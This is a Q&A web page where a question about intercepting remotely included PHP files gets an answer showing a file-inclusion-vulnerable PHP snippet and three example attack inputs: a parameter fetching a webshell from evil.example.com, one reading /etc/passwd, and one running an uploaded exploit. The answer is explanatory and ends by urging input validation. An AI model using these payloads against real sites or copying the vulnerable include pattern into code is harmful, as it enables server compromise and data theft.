Sign Up

Sign Up to our social questions and Answers Engine to ask questions, answer people’s questions, and connect with other people.

Have an account? Sign In

Have an account? Sign In Now

Sign In

Login to our social questions & Answers Engine to ask questions answer people’s questions & connect with other people.

Sign Up Here

Forgot Password?

Don't have account, Sign Up Here

Forgot Password

Lost your password? Please enter your email address. You will receive a link and will create a new password via email.

Have an account? Sign In Now

You must login to ask a question.

Forgot Password?

Need An Account, Sign Up Here

Please briefly explain why you feel this question should be reported.

Please briefly explain why you feel this answer should be reported.

Please briefly explain why you feel this user should be reported.

Sign InSign Up

The Archive Base

The Archive Base Logo The Archive Base Logo

The Archive Base Navigation

  • SEARCH
  • Home
  • About Us
  • Blog
  • Contact Us
Search
Ask A Question

Mobile menu

Close
Ask a Question
  • Home
  • Add group
  • Groups page
  • Feed
  • User Profile
  • Communities
  • Questions
    • New Questions
    • Trending Questions
    • Must read Questions
    • Hot Questions
  • Polls
  • Tags
  • Badges
  • Buy Points
  • Users
  • Help
  • Buy Theme
  • SEARCH
Home/ Questions/Q 8318979
In Process

The Archive Base Latest Questions

Editorial Team
  • 0
Editorial Team
Asked: June 8, 20262026-06-08T22:09:47+00:00 2026-06-08T22:09:47+00:00

I see it mentioned in this question: Including a remote php file as a

  • 0

I see it mentioned in this question:

Including a remote php file as a resource

So how can someone “intercept” (and modify ?) the data that is being sent / received? (In that question it’s a remote PHP file read with fopen)

  • 1 1 Answer
  • 0 Views
  • 0 Followers
  • 0
Share
  • Facebook
  • Report

Leave an answer
Cancel reply

You must login to add an answer.

Forgot Password?

Need An Account, Sign Up Here

1 Answer

  • Voted
  • Oldest
  • Recent
  • Random
  1. Editorial Team
    Editorial Team
    2026-06-08T22:09:50+00:00Added an answer on June 8, 2026 at 10:09 pm

    This example from Wikipedia that may cognise you of the ill-effects.

    <?php
       $color = 'blue';
       if (isset( $_GET['COLOR'] ) )
          $color = $_GET['COLOR'];
       include( $color . '.php' );
    ?>
    
    1. COLOR=http://evil.example.com/webshell.txt – injects a remotely hosted file containing a malicious code

    2. COLOR=/etc/passwd – allows an attacker to read the contents of the passwd file on a UNIX system directory traversal

    3. /vulnerable.php?COLOR=C:\ftp\upload\exploit – Executes code from an already uploaded file called exploit.php (local file inclusion vulnerability)

    I hope from these examples, the lurking dangers are clearer to you.

    “Untrusted Data Outside your script requires VALIDATION” to mitigate these attacks.

    • 0
    • Reply
    • Share
      Share
      • Share on Facebook
      • Share on Twitter
      • Share on LinkedIn
      • Share on WhatsApp
      • Report

Sidebar

Related Questions

In another question , someone mentioned this site which blew me away: http://zoomii.com Does
In looking at this question , commenter @Jon Egerton mentioned that MyClass was a
I can see this question has been asked many times before, but I just
I can't see it as mentioned here: http://www.c-sharpcorner.com/uploadfile/mahesh/dll12222005064058am/dll.aspx Do I have to activate somehow
Would what mentioned in the title be possible? Python module style that is. See
I am seeing a similar issue as mentioned in this question - https://stackoverflow.com/questions/1495390/how-do-i-invalidate-a-session-in-jsf .
Looking through PIL (and related to this question ), where can I get a
I know this question was asked earlier once but I see no answer to
I always see people mention that Python binding and C Sharp binding etc. when
SWFUpload doesn't work on ubuntu, I can see various mentions of it throughout the

Explore

  • Home
  • Add group
  • Groups page
  • Communities
  • Questions
    • New Questions
    • Trending Questions
    • Must read Questions
    • Hot Questions
  • Polls
  • Tags
  • Badges
  • Users
  • Help
  • SEARCH

Footer

© 2021 The Archive Base. All Rights Reserved
With Love by The Archive Base

Insert/edit link

Enter the destination URL

Or link to existing content

    No search term specified. Showing recent items. Search or use up and down arrow keys to select an item.